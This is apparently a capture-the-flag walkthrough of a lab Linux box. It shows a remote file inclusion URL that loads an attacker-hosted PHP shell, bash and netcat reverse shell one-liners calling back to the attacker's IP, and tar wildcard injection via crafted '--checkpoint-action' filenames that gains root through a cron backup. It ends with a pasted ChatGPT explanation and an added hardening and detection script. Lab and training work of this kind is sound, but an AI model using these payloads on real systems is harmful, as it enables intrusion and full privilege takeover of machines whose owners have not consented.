/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/table/langs/en_dlg.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/table/table.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/img/sample.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/image.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/js/image.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/editor_plugin_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/css/advimage.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/editor_plugin.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/langs
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/advimage/langs/en_dlg.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/fullpage
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/fullpage/js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/fullpage/js/fullpage.js
////////////////// WE RECONNECT AND CONTINUE THE MACHINE FROM WHERE WE LEFT OFF ///////
http://10.10.131.229/45kra24zxs28v3yd/administrator/
http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts
env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WE CHECK THE KERNEL VERSION, SYSTEM AND COMPILER:
cat /proc/version
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
cat /etc/issue
Ubuntu 16.04.6 LTS \n \l
WE LOOK INSIDE THE BACKUP.SH FILE:
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
WE CREATE OUR PAYLOAD TO BE EXECUTED BY ROOT VIA THE CRON JOBS AND ESCALATE PRIVILEGES, LISTENING WITH NETCAT:
#!/bin/bash
bash -i >& /dev/tcp/10.10.241.89/4445 0>&1
WE ADD OUR REVERSE SHELL TO THE BACKUP.SH FILE, BUT IN MILES' DIRECTORY IT WON'T LET US, SO FOR NOW WE ADD IT IN THE DIRECTORY THAT THE ORIGINAL BACKUP.SH POINTS TO, /var/www/html, which will be compressed with TAR:
echo '#!/bin/bash' > backup.sh && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> backup.sh
echo '#!/bin/bash' >> ~/.bash_history && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> ~/.bash_history
export PATH=/ejemplo:$PATH
NONE OF THE METHODS WORKED SO FAR, NOT EVEN THOSE FROM THE 4 WRITEUPS WE LOOKED AT AFTERWARDS.....!!!!!
--------------- WE TRY ANOTHER METHOD, TAKING ADVANTAGE OF THE CRONTABS RUN BY ROOT FOR THE BACKUP.SH FILE AND ALSO OF A VULNERABILITY IN HOW "TAR", WHEN COMPRESSING, MISHANDLES THE SPECIAL NAMES OF THE FILES WE ARE GOING TO CREATE, WITH A REVERSE SHELL THAT WE WILL LISTEN FOR WITH OUR NETCAT, RECEIVING A ROOT SHELL BECAUSE THAT IS WHO RUNS THIS MAIN CRON JOB:
IN THE DIRECTORY /var/www/html WE CREATE THIS FILE SHELL.SH:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
MEANWHILE WE LISTEN WITH NETCAT AND BINGO, AT LAST IT WORKED: WE GET ROOT AND ITS FLAG::
┌──(root㉿kali)-[~]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.241.89] from (UNKNOWN) [10.10.68.112] 50760
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# pwd
/var/www/html
# cd /root
# ls
root.txt
# cat root.txt
3f0372db24753accc7179a282cd6a949
# id
uid=0(root) gid=0(root) groups=0(root)
EXPLANATION OF THE VULNERABILITY ACCORDING TO ME AND GPT:
look, there are some crontabs executed by root that point to executing this file, with its content: cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * . and if we look at this .sh script it goes to the directory cd /var/www/html and uses tar to compress everything in it, so is the vulnerability here in how tar handles the special names of the files we created earlier when compressing them, and does it actually end up executing them as root because of this vulnerability, indirectly giving me a root shell on my netcat?
ChatGPT
Yes, it looks like you have correctly identified the possible vulnerability in the backup.sh script that runs through the crontabs as root. Let's analyze it in detail:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * .
Here is what the script does:
Changes to the /var/www/html directory.
Uses the tar command to create a backup.tgz archive in the /home/milesdyson/backups directory.
tar cf /home/milesdyson/backups/backup.tgz * . indicates that everything (*) in the current directory (.) should be included in the backup.tgz archive.
Now, if we recall the files you created earlier:
/var/www/html/--checkpoint-action=exec=sh shell.sh
/var/www/html/--checkpoint=1
It looks like you could take advantage of the vulnerability in how tar handles special filenames. If the backup script (backup.sh) is executed by root, and tar misinterprets the special filenames, you could achieve arbitrary command execution in the root context.
This could be a case of command injection via malicious filenames that tar interprets incorrectly. Additional testing would be needed to confirm exploitation of this specific vulnerability.
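As an added example (not code from the original writeup or the machine), the script below contrasts the weak backup.sh from this page with a hardened version that cannot be steered by option-like filenames, and adds the pre-flight check a defender would run over the directory being backed up; the function names and the temporary paths are assumptions.

```shell
#!/bin/sh
# Added example, not part of the writeup. Function names and paths are assumed.
#
# Weak pattern from the page: the shell expands "*" and any entry named
# "--checkpoint=1" or "--checkpoint-action=exec=..." is parsed by tar as an
# OPTION, not as a file, so the cron job runs attacker-chosen commands as root:
#   cd /var/www/html && tar cf /home/milesdyson/backups/backup.tgz *

# Detection: list entries of a directory whose names start with "-", i.e. the
# names a bare "*" would turn into options. Prints one basename per line.
find_option_like_names() {
    dir=$1
    find "$dir" -mindepth 1 -maxdepth 1 -name '-*' | sed 's|.*/||'
}

# Mitigation: archive "." from inside the source directory and end option
# parsing with "--", so nothing after it can ever be read as a tar option.
safe_backup() {
    src=$1
    out=$2
    ( cd "$src" && tar cf "$out" -- . )
}

# Self-contained demonstration on a constructed temporary directory.
demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/site" "$tmp/backups"
    echo 'index' > "$tmp/site/index.html"
    # Constructed filenames shaped like the ones in the writeup; the harmless
    # shell.sh only creates a marker so we can tell whether tar executed it.
    printf 'touch %s/marker\n' "$tmp" > "$tmp/site/shell.sh"
    : > "$tmp/site/--checkpoint=1"
    : > "$tmp/site/--checkpoint-action=exec=sh shell.sh"

    echo "Option-like names found in $tmp/site:"
    find_option_like_names "$tmp/site"

    safe_backup "$tmp/site" "$tmp/backups/backup.tar"
    if [ -e "$tmp/marker" ]; then
        echo "UNSAFE: shell.sh was executed by tar"; rm -rf "$tmp"; return 1
    fi
    echo "OK: archive written, no command executed"
    rm -rf "$tmp"
}
```

The same check belongs in the cron job itself: refuse to run (and alert) when find_option_like_names prints anything, because on this box a world-writable /var/www/html is what let www-data plant those names.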